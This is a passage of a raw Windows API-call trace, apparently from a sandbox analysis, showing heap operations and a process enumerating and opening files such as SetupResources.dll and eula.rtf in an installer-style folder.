(hObject=0x420) returned 1 [0060.240] AreFileApisANSI () returned 1 [0060.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x719c8 [0060.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 46 [0060.241] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.241] GetFileType (hFile=0x420) returned 0x1 [0060.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0060.241] CloseHandle (hObject=0x420) returned 1 [0060.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0060.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0060.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0060.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0060.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0060.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0060.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0060.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0060.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.242] AreFileApisANSI () returned 1 [0060.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x717c0 [0060.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 46 [0060.242] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758)) returned 1 [0060.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0060.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.242] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.242] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.242] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x46980, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓㝘")) returned 0 [0060.242] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0060.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0060.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0060.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0060.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0060.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0060.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45f68 | out: hHeap=0x20000) returned 1 [0060.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0060.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0060.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0060.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0060.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0060.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0060.243] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.243] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.243] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.243] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0060.243] AreFileApisANSI () returned 1 [0060.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1029", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1029", lpUsedDefaultChar=0x0) returned 27 [0060.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.243] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.243] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0060.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0060.243] AreFileApisANSI () returned 1 [0060.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029") returned 27 [0060.243] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029" (normalized: "c:\\588bce7c90097ed212\\1029"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.244] GetLastError () returned 0x5 [0060.244] GetLastError () returned 0x5 [0060.244] SetLastError (dwErrCode=0x5) [0060.244] GetLastError () returned 0x5 [0060.244] SetLastError (dwErrCode=0x5) [0060.244] GetLastError () returned 0x5 [0060.244] SetLastError (dwErrCode=0x5) [0060.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.244] AreFileApisANSI () returned 1 [0060.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029") returned 27 [0060.244] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029" (normalized: "c:\\588bce7c90097ed212\\1029"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.244] GetLastError () returned 0x5 [0060.244] GetLastError () returned 0x5 [0060.244] SetLastError (dwErrCode=0x5) [0060.244] GetLastError () returned 0x5 [0060.244] SetLastError (dwErrCode=0x5) [0060.244] GetLastError () returned 0x5 [0060.244] SetLastError (dwErrCode=0x5) [0060.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0060.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0060.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0060.245] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="1030", cAlternateFileName="")) returned 1 [0060.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0060.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0060.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.245] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0060.246] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.246] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0060.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0060.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0060.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45ef8 [0060.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0060.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0060.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0060.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0060.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0060.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0060.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0060.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0060.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71960 [0060.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0060.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0060.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.247] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.247] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.247] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.247] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0060.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0060.247] AreFileApisANSI () returned 1 [0060.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1029\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1029\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0060.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.247] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.247] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0060.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0060.247] AreFileApisANSI () returned 1 [0060.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0060.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 36 [0060.247] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.250] GetFileType (hFile=0x420) returned 0x1 [0060.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0060.250] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.250] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.250] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.251] CloseHandle (hObject=0x420) returned 1 [0060.251] AreFileApisANSI () returned 1 [0060.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69170 [0060.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 36 [0060.251] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.251] GetFileType (hFile=0x420) returned 0x1 [0060.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0060.251] CloseHandle (hObject=0x420) returned 1 [0060.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0060.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0060.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 